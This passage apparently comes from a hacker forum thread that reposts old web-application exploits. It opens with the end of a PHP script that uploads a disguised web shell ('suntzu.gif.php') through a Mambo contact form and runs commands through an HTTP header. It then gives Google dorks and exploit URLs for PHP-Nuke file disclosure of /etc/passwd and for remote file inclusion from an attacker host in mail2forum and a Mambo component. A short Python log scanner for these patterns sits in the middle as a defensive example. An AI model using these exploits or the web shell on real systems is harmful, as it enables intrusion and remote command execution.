fclose($ock);
#debug
#echo "\r\n".$html;
}
$host=$argv[1];
$path=$argv[2];
$itemid=$argv[3];
$cmd="";
$port=80;
$proxy="";
for ($i=4; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$data=" -7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"contact_name\";\r\n\r\n";
$data.="suntzu\r\n";
$data.=" -7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"contact_email\";\r\n\r\n";
$data.="suntzu@suntzu.org\r\n";
$data.=" -7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"contact_subject\";\r\n\r\n";
$data.="hereitissuntzu\r\n";
$data.=" -7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"contact_text\";\r\n\r\n";
$data.="ohshit\r\n";
$data.=" -7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"task\";\r\n\r\n";
$data.="post\r\n";
$data.=" -7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"send\";\r\n\r\n";
$data.="Send\r\n";
$data.=" -7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"contact_attach\";
filename=\"suntzu.gif.php\";\r\n";
$data.="Content-Type: image/gif;\r\n\r\n";
$data.="<?php set_time_limit(0); echo
'my_delim';passthru(\$_SERVER['HTTP_SUNTZU']);die;?>\r\n";
$data.=" -7d529a1d23092a \r\n";
$packet ="POST ".$p."index.php?option=contact&Itemid=$itemid HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Type: multipart/form-data; boundary= -7d529a1d23092a\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$packet ="GET ".$p."images/contact/suntzu.gif.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="SUNTZU: ".$cmd."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"my_delim"))
{
echo "exploit succeeded \r\n";
$temp=explode("my_delim",$html);
die($temp[1]);
}
//if you are here
echo "exploit failed \r\n";
?>
[/quote]
navaro(HCE)
local file include in PHP-Nuke (autohtml.php)
google: allinurl:"autohtml.php"
Xploit:
Code:
http://site/autohtml.php?op=modload&name=[file to retrieve]
Example:
Code:
http://www.site.com/autohtml.php?op=modload&name= / / / /etc/passwd
black_hat_cr(HCE)
mail2forum <= 1.2 Multiple Remote File Include Vulnerabilities
##################################################
#############################
Discovered By OLiBekaS
-
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : mail for phpbb (bulletin board/forum software)
version : latest version [ 1.2 ]
URL : http://www.www.mail2forum.com
-
dork : allinurl:/m2f_usercp.php?
Exploit :
http://[target]/[forum_path]/m2f/m2f_phpbb204.php?m2f_root_path=http://[attack er]/cmd.txt?&cmd=ls
http://[target]/[forum_path]/m2f/m2f_forum.php?m2f_root_path=http://[attacker]/c md.txt?&cmd=ls
http://[target]/[forum_path]/m2f/m2f_mailinglist.php?m2f_root_path=http://[attack er]/cmd.txt?&cmd=ls
http://[target]/[forum_path]/m2f/m2f_cron.php?m2f_root_path=http://[attacker]/cm d.txt?&cmd=ls
baby_hacker(HCE)
Mambo component Remote Exploit
Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew
Another Mambo component remote inclusion vulnerability
download : http://mamboxchange.com/frs/download 1.0-Stable.zip
bug found in file file_upload.php :
require_once("$sbp/sb_helpers.php");
inject :
http://website.com/components/com_si pload.php?sbp=[evil_script]
Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo,
and all #batamhacker [at] dalnet crew, #mardongan, #motha, #papmahackerlink
# milw0rm.com [2006-07-08]
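For defenders, the request patterns in the posts above (a remote URL passed in an include-path parameter, directory traversal in a file-name parameter, and a script stored behind an image extension) can be searched for in web access logs. The following is an added example, not part of the original posts; the log lines, IP addresses and the allow-list entry are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines (documentation IP ranges, made-up paths).
SAMPLE_LOG = [
    '203.0.113.5 - - [08/Jul/2006:10:00:01 +0000] "GET /forum/m2f/m2f_cron.php'
    '?m2f_root_path=http://198.51.100.9/cmd.txt?&cmd=ls HTTP/1.0" 200 512',
    '203.0.113.5 - - [08/Jul/2006:10:00:07 +0000] "GET /autohtml.php'
    '?op=modload&name=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.0" 200 1440',
    '203.0.113.7 - - [08/Jul/2006:10:01:30 +0000] '
    '"GET /images/contact/photo.gif.php HTTP/1.0" 200 64',
    '192.0.2.44 - - [08/Jul/2006:10:02:00 +0000] '
    '"GET /index.php?option=contact&Itemid=3 HTTP/1.0" 200 9000',
    '192.0.2.44 - - [08/Jul/2006:10:02:05 +0000] '
    '"GET /redirect.php?url=http://example.org/ HTTP/1.0" 302 0',
]

REQ = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE = re.compile(r"^(?:https?://|ftp://|php://|data:)", re.I)
TRAVERSAL = re.compile(r"(?:^|[/\\])\.\.(?:[/\\]|$)")
DOUBLE_EXT = re.compile(r"\.(?:gif|jpe?g|png|bmp)\.(?:php\d?|phtml)$", re.I)

def classify(line, allow=frozenset()):
    """Return a sorted list of finding labels for one access-log line."""
    m = REQ.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    findings = set()
    # An image extension followed by a script extension, e.g. x.gif.php
    if DOUBLE_EXT.search(unquote(url.path)):
        findings.add("script-behind-image-extension")
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if (url.path, name) in allow:   # known-good (path, parameter) pairs
            continue
        value = unquote(value)          # second decode catches %252e%252e
        if REMOTE.match(value):
            findings.add("remote-url-in-parameter:" + name)
        if TRAVERSAL.search(value) or "\x00" in value:
            findings.add("path-traversal-in-parameter:" + name)
    return sorted(findings)

def scan(lines, allow=frozenset()):
    """Return (client_ip, findings) for every line with at least one finding."""
    return [(l.split(" ", 1)[0], f) for l in lines if (f := classify(l, allow))]

if __name__ == "__main__":
    for ip, found in scan(SAMPLE_LOG, allow={("/redirect.php", "url")}):
        print(ip, found)
```

Parameters that legitimately carry URLs, such as a redirect target, go in the allow-list; otherwise they are reported like the include-path cases.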
vns3curity(HCE)
ME Download System <= 1.3 (header.php) Remote Inclusion Vulnerability
Code:
+ -
+
+ ME Download System 1.3 Remote File Inclusion
+
+ -
+
+ Affected Software : ME Download System 1.3
+ Vendor : http://www.ehmig.net/
+ Class : Remote File Inclusion
+ Risk : high (Remote File Execution)